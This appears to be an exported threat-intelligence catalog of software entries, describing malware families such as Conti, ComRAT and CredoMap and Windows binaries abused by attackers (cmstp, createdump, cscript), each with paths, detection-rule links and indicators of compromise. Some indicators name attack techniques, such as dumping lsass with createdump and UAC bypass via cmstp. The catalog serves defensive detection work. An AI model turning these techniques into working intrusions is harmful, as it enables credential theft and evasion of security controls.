<sup>[[Cmstp.exe - LOLBAS Project](/references/86c21dcd-464a-4870-8aae-25fcaccc889d)]</sup>

The tag is: misp-galaxy:software="Cmstp.exe - Associated Software"

Cmstp

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Installs or removes a Connection Manager service profile.

Author: Oddvar Moe

Paths: * C:\Windows\System32\cmstp.exe * C:\Windows\SysWOW64\cmstp.exe

Detection: * Sigma: [proc_creation_win_cmstp_execution_by_creation.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_cmstp_execution_by_creation.yml) * Sigma: [proc_creation_win_uac_bypass_cmstp.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml) * Splunk: [cmlua_or_cmstplua_uac_bypass.yml](https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml) * Elastic: [defense_evasion_suspicious_managedcode_host_process.toml](https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml) * Elastic: [defense_evasion_unusual_process_network_connection.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml) * IOC: Execution of cmstp.exe without a VPN use case is suspicious * IOC: DotNet CLR libraries loaded into cmstp.exe * IOC: DotNet CLR Usage Log - cmstp.exe.log<sup>[[Cmstp.exe - LOLBAS Project](/references/86c21dcd-464a-4870-8aae-25fcaccc889d)]</sup>

The tag is: misp-galaxy:software="Cmstp"

Cobalt Strike

[Cobalt Strike](https://app.tidalcyber.com/software/9b6bcbba-3ab4-4a4c-a233-cd12254823f6) is a commercial, full-featured, remote access tool that bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system.<sup>[[cobaltstrike manual](https://app.tidalcyber.com/references/43277d05-0aa4-4cee-ac41-6f03a49851a9)]</sup>

In addition to its own capabilities, [Cobalt Strike](https://app.tidalcyber.com/software/9b6bcbba-3ab4-4a4c-a233-cd12254823f6) leverages the capabilities of other well-known tools such as Metasploit and Mimikatz.<sup>[[cobaltstrike manual](https://app.tidalcyber.com/references/43277d05-0aa4-4cee-ac41-6f03a49851a9)]</sup>

The tag is: misp-galaxy:software="Cobalt Strike"

Cobalt Strike Random C2 Profile Generator

This is an open-source tool for creating Cobalt Strike Malleable C2 profiles with randomly generated variables.<sup>[[GitHub random_c2_profile](/references/dcb30328-6aa4-461b-8333-451d6af4b384)]</sup> According to a September 2023 CERT-FR advisory, during an intrusion in March 2023, actors attributed to FIN12 used the tool to generate a Cobalt Strike malleable C2 profile.<sup>[[CERTFR-2023-CTI-007](/references/0f4a03c5-79b3-418e-a77d-305d5a32caca)]</sup>

The tag is: misp-galaxy:software="Cobalt Strike Random C2 Profile Generator"

Cobian RAT

[Cobian RAT](https://app.tidalcyber.com/software/d4e6f9f7-7f4d-47c2-be24-b267d9317303) is a backdoor, remote access tool that has been observed since 2016.<sup>[[Zscaler Cobian Aug 2017](https://app.tidalcyber.com/references/46541bb9-15cb-4a7c-a624-48a1c7e838e3)]</sup>

The tag is: misp-galaxy:software="Cobian RAT"

code.exe - Associated Software

<sup>[[code.exe - LOLBAS Project](/references/4a93063b-f3a3-4726-870d-b8f744651363)]</sup>

The tag is: misp-galaxy:software="code.exe - Associated Software"

code

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: VSCode binary, also portable (CLI) version

Author: PfiatDe

Paths: * %LOCALAPPDATA%\Programs\Microsoft VS Code\Code.exe * C:\Program Files\Microsoft VS Code\Code.exe * C:\Program Files (x86)\Microsoft VS Code\Code.exe

Detection: * IOC: WebSocket traffic to global.rel.tunnels.api.visualstudio.com * IOC: Process tree: code.exe → cmd.exe → node.exe → winpty-agent.exe * IOC: File write of code_tunnel.json, whose location is parameterizable but defaults to %UserProfile%\.vscode-cli\code_tunnel.json<sup>[[code.exe - LOLBAS Project](/references/4a93063b-f3a3-4726-870d-b8f744651363)]</sup>

The tag is: misp-galaxy:software="code"

CoinTicker

[CoinTicker](https://app.tidalcyber.com/software/b0d9b31a-072b-4744-8d2f-3a63256a932f) is a malicious application that poses as a cryptocurrency price ticker and installs components of the open source backdoors EvilOSX and EggShell.<sup>[[CoinTicker 2019](https://app.tidalcyber.com/references/99c53143-6f93-44c9-a874-c1b9e4506fb4)]</sup>

The tag is: misp-galaxy:software="CoinTicker"

Colorcpl.exe - Associated Software

<sup>[[Colorcpl.exe - LOLBAS Project](/references/53ff662d-a0b3-41bd-ab9e-a9bb8bbdea25)]</sup>

The tag is: misp-galaxy:software="Colorcpl.exe - Associated Software"

Colorcpl

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Binary that handles color management

Author: Arjan Onwezen

Paths: * C:\Windows\System32\colorcpl.exe * C:\Windows\SysWOW64\colorcpl.exe

Detection: * Sigma: [file_event_win_susp_colorcpl.yml](https://github.com/SigmaHQ/sigma/blob/master/rules/windows/file/file_event/file_event_win_susp_colorcpl.yml) * IOC: colorcpl.exe writing files<sup>[[Colorcpl.exe - LOLBAS Project](/references/53ff662d-a0b3-41bd-ab9e-a9bb8bbdea25)]</sup>

The tag is: misp-galaxy:software="Colorcpl"

Comnie

[Comnie](https://app.tidalcyber.com/software/341fc709-4908-4e41-8df3-554dae6d72b0) is a remote backdoor which has been used in attacks in East Asia. <sup>[[Palo Alto Comnie](https://app.tidalcyber.com/references/ff3cc105-2798-45de-8561-983bf57eb9d9)]</sup>

The tag is: misp-galaxy:software="Comnie"

ComRAT

[ComRAT](https://app.tidalcyber.com/software/300c5997-a486-4a61-8213-93a180c22849) is a second stage implant suspected of being a descendant of [Agent.btz](https://app.tidalcyber.com/software/f27c9a91-c618-40c6-837d-089ba4d80f45) and used by [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2). The first version of [ComRAT](https://app.tidalcyber.com/software/300c5997-a486-4a61-8213-93a180c22849) was identified in 2007, but the tool has undergone substantial development for many years since.<sup>[[Symantec Waterbug](https://app.tidalcyber.com/references/ec02f951-17b8-44cb-945a-e5c313555124)]</sup><sup>[[NorthSec 2015 GData Uroburos Tools](https://app.tidalcyber.com/references/99e2709e-a32a-4fbf-a20a-ffcdd8befdc8)]</sup><sup>[[ESET ComRAT May 2020](https://app.tidalcyber.com/references/cd9043b8-4d14-449b-a6b2-2e9b99103bb0)]</sup>

The tag is: misp-galaxy:software="ComRAT"

Comsvcs.dll - Associated Software

<sup>[[Comsvcs.dll - LOLBAS Project](/references/2eb2756d-5a49-4df3-9e2f-104c41c645cd)]</sup>

The tag is: misp-galaxy:software="Comsvcs.dll - Associated Software"

Comsvcs

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: COM+ Services

Author: LOLBAS Team

Paths: * c:\windows\system32\comsvcs.dll

The tag is: misp-galaxy:software="Comsvcs"

Kido - Associated Software

The tag is: misp-galaxy:software="Kido - Associated Software"

Downadup - Associated Software

The tag is: misp-galaxy:software="Downadup - Associated Software"

Conficker

[Conficker](https://app.tidalcyber.com/software/ef33f1fa-18a3-4b30-b359-17b7930f43a7) is a computer worm first detected in October 2008 that targeted Microsoft Windows using the MS08-067 Windows vulnerability to spread.<sup>[[SANS Conficker](https://app.tidalcyber.com/references/2dca2274-5f25-475a-b87d-97f3e3a525de)]</sup> In 2016, a variant of [Conficker](https://app.tidalcyber.com/software/ef33f1fa-18a3-4b30-b359-17b7930f43a7) made its way on computers and removable disk drives belonging to a nuclear power plant.<sup>[[Conficker Nuclear Power Plant](https://app.tidalcyber.com/references/83b8c3c4-d67a-48bd-8614-1c703a8d969b)]</sup>

The tag is: misp-galaxy:software="Conficker"

ConfigSecurityPolicy.exe - Associated Software

<sup>[[ConfigSecurityPolicy.exe - LOLBAS Project](/references/30b8a5d8-596c-4ab3-b3db-b799cc8923e1)]</sup>

The tag is: misp-galaxy:software="ConfigSecurityPolicy.exe - Associated Software"

ConfigSecurityPolicy

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. You can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.

Author: Ialle Teixeira

Paths: * C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe * C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe

Detection: * Sigma: [proc_creation_win_lolbin_configsecuritypolicy.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml) * IOC: ConfigSecurityPolicy storing data into alternate data streams. * IOC: Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS. * IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe. * IOC: User Agent is "MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)"<sup>[[ConfigSecurityPolicy.exe - LOLBAS Project](/references/30b8a5d8-596c-4ab3-b3db-b799cc8923e1)]</sup>

The tag is: misp-galaxy:software="ConfigSecurityPolicy"

Conhost.exe - Associated Software

<sup>[[Conhost.exe - LOLBAS Project](/references/5ed807c1-15d1-48aa-b497-8cd74fe5b299)]</sup>

The tag is: misp-galaxy:software="Conhost.exe - Associated Software"

Conhost

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Console Window host

Author: Wietze Beukema

Paths: * c:\windows\system32\conhost.exe

Detection: * IOC: conhost.exe spawning unexpected processes * Sigma: proc_creation_win_conhost_susp_child_process.yml<sup>[[Conhost.exe - LOLBAS Project](/references/5ed807c1-15d1-48aa-b497-8cd74fe5b299)]</sup>

The tag is: misp-galaxy:software="Conhost"

ScreenConnect - Associated Software

<sup>[[Anomali Static Kitten February 2021](https://app.tidalcyber.com/references/710ed789-de1f-4601-a8ba-32147827adcb)]</sup>

The tag is: misp-galaxy:software="ScreenConnect - Associated Software"

ConnectWise

[ConnectWise](https://app.tidalcyber.com/software/6f9bb24d-cce2-49de-bedd-1849d9bde7a0) is a legitimate remote administration tool that has been used since at least 2016 by threat actors including [MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6) and [GOLD SOUTHFIELD](https://app.tidalcyber.com/groups/b4d068ac-9b68-4cd8-bf0c-019f910ef8e3) to connect to and conduct lateral movement in target environments.<sup>[[Anomali Static Kitten February 2021](https://app.tidalcyber.com/references/710ed789-de1f-4601-a8ba-32147827adcb)]</sup><sup>[[Trend Micro Muddy Water March 2021](https://app.tidalcyber.com/references/16b4b834-2f44-4bac-b810-f92080c41f09)]</sup>

The tag is: misp-galaxy:software="ConnectWise"

Conti

[Conti](https://app.tidalcyber.com/software/8e995c29-2759-4aeb-9a0f-bb7cd97b06e5) is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. [Conti](https://app.tidalcyber.com/software/8e995c29-2759-4aeb-9a0f-bb7cd97b06e5) has been deployed via [TrickBot](https://app.tidalcyber.com/software/c2bd4213-fc7b-474f-b5a0-28145b07c51d) and used against major corporations and government agencies, particularly those in North America. As with other ransomware families, actors using [Conti](https://app.tidalcyber.com/software/8e995c29-2759-4aeb-9a0f-bb7cd97b06e5) steal sensitive files and information from compromised networks, and threaten to publish this data unless the ransom is paid.<sup>[[Cybereason Conti Jan 2021](https://app.tidalcyber.com/references/3c0e82a2-41ab-4e63-ac10-bd691c786234)]</sup><sup>[[CarbonBlack Conti July 2020](https://app.tidalcyber.com/references/3c3a6dc0-66f2-492e-8c9c-c0bcca73008e)]</sup><sup>[[Cybleinc Conti January 2020](https://app.tidalcyber.com/references/5ef0ad9d-f34d-4771-a595-7ee4994f6c91)]</sup>

The tag is: misp-galaxy:software="Conti"

Control.exe - Associated Software

<sup>[[Control.exe - LOLBAS Project](/references/d0c821b9-7d37-4158-89fa-0dabe6e06800)]</sup>

The tag is: misp-galaxy:software="Control.exe - Associated Software"

Control

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Binary used to launch controlpanel items in Windows

Author: Oddvar Moe

Paths: * C:\Windows\System32\control.exe * C:\Windows\SysWOW64\control.exe

Detection: * Sigma: [proc_creation_win_exploit_cve_2021_40444.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules-emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml) * Sigma: [proc_creation_win_rundll32_susp_control_dll_load.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml) * Elastic: [defense_evasion_network_connection_from_windows_binary.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml) * Elastic: [defense_evasion_execution_control_panel_suspicious_args.toml](https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml) * Elastic: [defense_evasion_unusual_dir_ads.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml) * IOC: Control.exe executing files from alternate data streams * IOC: Control.exe executing library file without cpl extension * IOC: Suspicious network connections from control.exe<sup>[[Control.exe - LOLBAS Project](/references/d0c821b9-7d37-4158-89fa-0dabe6e06800)]</sup>

The tag is: misp-galaxy:software="Control"

CookieMiner

[CookieMiner](https://app.tidalcyber.com/software/6e2c4aef-2f69-4507-9ee3-55432d76341e) is Mac-based malware that targets information associated with cryptocurrency exchanges as well as enabling cryptocurrency mining on the victim system itself. It was first discovered in the wild in 2019.<sup>[[Unit42 CookieMiner Jan 2019](https://app.tidalcyber.com/references/4605c51d-b36e-4c29-abda-2a97829f6019)]</sup>

The tag is: misp-galaxy:software="CookieMiner"

coregen.exe - Associated Software

<sup>[[coregen.exe - LOLBAS Project](/references/f24d4cf5-9ca9-46bd-bd43-86b37e2a638a)]</sup>

The tag is: misp-galaxy:software="coregen.exe - Associated Software"

coregen

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: The binary coregen.exe (Microsoft CoreCLR Native Image Generator) loads the exported function GetCLRRuntimeHost from coreclr.dll, or from a .DLL at an arbitrary path. Coregen is located within "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\" or the directory of another Silverlight version. Coregen is signed by Microsoft and bundled with Microsoft Silverlight.

Author: Martin Sohn Christensen

Paths: * C:\Program Files\Microsoft Silverlight\5.1.50918.0\coregen.exe * C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe

Detection: * Sigma: [image_load_side_load_coregen.yml](https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/image_load/image_load_side_load_coregen.yml) * IOC: coregen.exe loading a .dll file not in "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\" * IOC: coregen.exe loading a .dll file not named coreclr.dll * IOC: coregen.exe command line containing -L or -l * IOC: coregen.exe command line containing an unexpected/invalid assembly name * IOC: coregen.exe application crash caused by an invalid assembly name<sup>[[coregen.exe - LOLBAS Project](/references/f24d4cf5-9ca9-46bd-bd43-86b37e2a638a)]</sup>

The tag is: misp-galaxy:software="coregen"

Sofacy - Associated Software

This designation has been used in reporting both to refer to the threat group ([APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5)) and its associated malware.<sup>[[FireEye APT28](https://app.tidalcyber.com/references/c423b2b2-25a3-4a8d-b89a-83ab07c0cd20)]</sup> <sup>[[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)]</sup><sup>[[Securelist Sofacy Feb 2018](https://app.tidalcyber.com/references/3a043bba-2451-4765-946b-c1f3bf4aea36)]</sup>

The tag is: misp-galaxy:software="Sofacy - Associated Software"

SOURFACE - Associated Software

The tag is: misp-galaxy:software="SOURFACE - Associated Software"

CORESHELL

[CORESHELL](https://app.tidalcyber.com/software/3b193f62-2b49-4eff-bdf4-501fb8a28274) is a downloader used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5). The older versions of this malware are known as SOURFACE and newer versions as CORESHELL.<sup>[[FireEye APT28](https://app.tidalcyber.com/references/c423b2b2-25a3-4a8d-b89a-83ab07c0cd20)]</sup> <sup>[[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)]</sup>

The tag is: misp-galaxy:software="CORESHELL"

TinyBaron - Associated Software

The tag is: misp-galaxy:software="TinyBaron - Associated Software"

BotgenStudios - Associated Software

The tag is: misp-galaxy:software="BotgenStudios - Associated Software"

NemesisGemina - Associated Software

The tag is: misp-galaxy:software="NemesisGemina - Associated Software"

CosmicDuke

The tag is: misp-galaxy:software="CosmicDuke"

CostaBricks

[CostaBricks](https://app.tidalcyber.com/software/ea9e2d19-89fe-4039-a1e0-467b14554c6f) is a loader that was used to deploy 32-bit backdoors in the [CostaRicto](https://app.tidalcyber.com/groups/) campaign.<sup>[[BlackBerry CostaRicto November 2020](https://app.tidalcyber.com/references/93a23447-641c-4ee2-9fbd-64b2adea8a5f)]</sup>

The tag is: misp-galaxy:software="CostaBricks"

CozyDuke - Associated Software

The tag is: misp-galaxy:software="CozyDuke - Associated Software"

CozyBear - Associated Software

The tag is: misp-galaxy:software="CozyBear - Associated Software"

Cozer - Associated Software

The tag is: misp-galaxy:software="Cozer - Associated Software"

EuroAPT - Associated Software

The tag is: misp-galaxy:software="EuroAPT - Associated Software"

CozyCar

[CozyCar](https://app.tidalcyber.com/software/c2353daa-fd4c-44e1-8013-55400439965a) is malware that was used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) from 2010 to 2015. It is a modular malware platform, and its backdoor component can be instructed to download and execute a variety of modules with different functionality. <sup>[[F-Secure The Dukes](https://app.tidalcyber.com/references/cc0dc623-ceb5-4ac6-bfbb-4f8514d45a27)]</sup>

The tag is: misp-galaxy:software="CozyCar"

CrackMapExec

[CrackMapExec](https://app.tidalcyber.com/software/47e710b4-1397-47cf-a979-20891192f313), or CME, is a post-exploitation tool developed in Python and designed for penetration testing against networks. [CrackMapExec](https://app.tidalcyber.com/software/47e710b4-1397-47cf-a979-20891192f313) collects Active Directory information to conduct lateral movement through targeted networks.<sup>[[CME Github September 2018](https://app.tidalcyber.com/references/a6e1e3b4-1b69-43b7-afbe-aedb812c5778)]</sup>

The tag is: misp-galaxy:software="CrackMapExec"

Createdump.exe - Associated Software

<sup>[[Createdump.exe - LOLBAS Project](/references/f3ccacc1-3b42-4042-9a5c-f5b483a5e801)]</sup>

The tag is: misp-galaxy:software="Createdump.exe - Associated Software"

Createdump

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Microsoft .NET Runtime Crash Dump Generator (included in .NET Core)

Author: mr.d0x, Daniel Santos

Paths:

* C:\Program Files\dotnet\shared\Microsoft.NETCore.App\*\createdump.exe
* C:\Program Files (x86)\dotnet\shared\Microsoft.NETCore.App\*\createdump.exe
* C:\Program Files\Microsoft Visual Studio\*\Community\dotnet\runtime\shared\Microsoft.NETCore.App\6.0.0\createdump.exe
* C:\Program Files (x86)\Microsoft Visual Studio\*\Community\dotnet\runtime\shared\Microsoft.NETCore.App\6.0.0\createdump.exe

Detection:

* Sigma: [proc_creation_win_proc_dump_createdump.yml](https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml)
* Sigma: [proc_creation_win_renamed_createdump.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_renamed_createdump.yml)
* IOC: createdump.exe process with a command line containing the lsass.exe process id<sup>[[Createdump.exe - LOLBAS Project](/references/f3ccacc1-3b42-4042-9a5c-f5b483a5e801)]</sup>

The tag is: misp-galaxy:software="Createdump"

CredoMap

CredoMap is a credential-stealing malware developed by the Russian espionage actor APT28. The malware harvests cookies and credentials from select web browsers and exfiltrates the information via the IMAP email protocol. CredoMap was observed being used in attack campaigns in Ukraine in 2022.<sup>[[CERTFR-2023-CTI-009](/references/5365ac4c-fbb8-4389-989e-a64cb7693371)]</sup><sup>[[SecurityScorecard CredoMap September 2022](/references/3e683efc-4712-4397-8d55-4354ff7ad9f0)]</sup>

The tag is: misp-galaxy:software="CredoMap"

CreepyDrive

[CreepyDrive](https://app.tidalcyber.com/software/7f7f05c3-fbb1-475e-b672-2113709065c8) is a custom implant that has been used by [POLONIUM](https://app.tidalcyber.com/groups/7fbd7514-76e9-4696-8c66-9f95546e3315) since at least early 2022 for C2 with, and exfiltration to, actor-controlled OneDrive accounts.<sup>[[Microsoft POLONIUM June 2022](https://app.tidalcyber.com/references/689ff1ab-9fed-4aa2-8e5e-78dac31e6fbd)]</sup>

[POLONIUM](https://app.tidalcyber.com/groups/7fbd7514-76e9-4696-8c66-9f95546e3315) has used a similar implant called CreepyBox that relies on actor-controlled DropBox accounts.<sup>[[Microsoft POLONIUM June 2022](https://app.tidalcyber.com/references/689ff1ab-9fed-4aa2-8e5e-78dac31e6fbd)]</sup>

The tag is: misp-galaxy:software="CreepyDrive"

CreepySnail

[CreepySnail](https://app.tidalcyber.com/software/11ce380c-481b-4c9b-b44e-06f1a91c01c1) is a custom PowerShell implant that has been used by [POLONIUM](https://app.tidalcyber.com/groups/7fbd7514-76e9-4696-8c66-9f95546e3315) since at least 2022.<sup>[[Microsoft POLONIUM June 2022](https://app.tidalcyber.com/references/689ff1ab-9fed-4aa2-8e5e-78dac31e6fbd)]</sup>

The tag is: misp-galaxy:software="CreepySnail"

MSIL/Crimson - Associated Software

<sup>[[Proofpoint Operation Transparent Tribe March 2016](https://app.tidalcyber.com/references/8e39d0da-114f-4ae6-8130-ca1380077d6a)]</sup>

The tag is: misp-galaxy:software="MSIL/Crimson - Associated Software"

Crimson

[Crimson](https://app.tidalcyber.com/software/3b3f296f-20a6-459a-98c5-62ebdee3701f) is a remote access Trojan that has been used by [Transparent Tribe](https://app.tidalcyber.com/groups/441b91d1-256a-4763-bac6-8f1c76764a25) since at least 2016.<sup>[[Proofpoint Operation Transparent Tribe March 2016](https://app.tidalcyber.com/references/8e39d0da-114f-4ae6-8130-ca1380077d6a)]</sup><sup>[[Kaspersky Transparent Tribe August 2020](https://app.tidalcyber.com/references/42c7faa2-f664-4e4a-9d23-93c88a09da5b)]</sup>

The tag is: misp-galaxy:software="Crimson"

CrossRAT

The tag is: misp-galaxy:software="CrossRAT"

Crutch

[Crutch](https://app.tidalcyber.com/software/e1ad229b-d750-4148-a1f3-36e767b03cd1) is a backdoor designed for document theft that has been used by [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2) since at least 2015.<sup>[[ESET Crutch December 2020](https://app.tidalcyber.com/references/8b2f40f5-7dca-4edf-8314-a8f5bc4831b8)]</sup>

The tag is: misp-galaxy:software="Crutch"

Cryptoistic

The tag is: misp-galaxy:software="Cryptoistic"

Csc.exe - Associated Software

<sup>[[Csc.exe - LOLBAS Project](/references/276c9e55-4673-426d-8f49-06edee2e3b30)]</sup>

The tag is: misp-galaxy:software="Csc.exe - Associated Software"

Csc

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Binary file used by .NET to compile C# code

Author: Oddvar Moe

Paths:

* C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe

Detection:

* Sigma: [proc_creation_win_csc_susp_parent.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_parent.yml)
* Sigma: [proc_creation_win_csc_susp_folder.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_folder.yml)
* Elastic: [defense_evasion_dotnet_compiler_parent_process.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml)
* Elastic: [defense_evasion_execution_msbuild_started_unusal_process.toml](https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml)
* IOC: Csc.exe should normally not run as the System account unless it is used for development.<sup>[[Csc.exe - LOLBAS Project](/references/276c9e55-4673-426d-8f49-06edee2e3b30)]</sup>

The tag is: misp-galaxy:software="Csc"

Cscript.exe - Associated Software

<sup>[[Cscript.exe - LOLBAS Project](/references/428b6223-63b7-497f-b13a-e472b4583a9f)]</sup>

The tag is: misp-galaxy:software="Cscript.exe - Associated Software"

Cscript

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Binary used to execute scripts in Windows

Author: Oddvar Moe

Paths:

* C:\Windows\System32\cscript.exe
* C:\Windows\SysWOW64\cscript.exe

Detection:

* Sigma: [proc_creation_win_wscript_cscript_script_exec.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml)
* Sigma: [file_event_win_net_cli_artefact.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml)
* Elastic: [defense_evasion_unusual_dir_ads.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml)
* Elastic: [command_and_control_remote_file_copy_scripts.toml](https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml)
* Elastic: [defense_evasion_suspicious_managedcode_host_process.toml](https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml)
* Splunk: [wscript_or_cscript_suspicious_child_process.yml](https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml)
* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)
* IOC: Cscript.exe executing files from alternate data streams
* IOC: DotNet CLR libraries loaded into cscript.exe
* IOC: DotNet CLR Usage Log - cscript.exe.log<sup>[[Cscript.exe - LOLBAS Project](/references/428b6223-63b7-497f-b13a-e472b4583a9f)]</sup>

The tag is: misp-galaxy:software="Cscript"

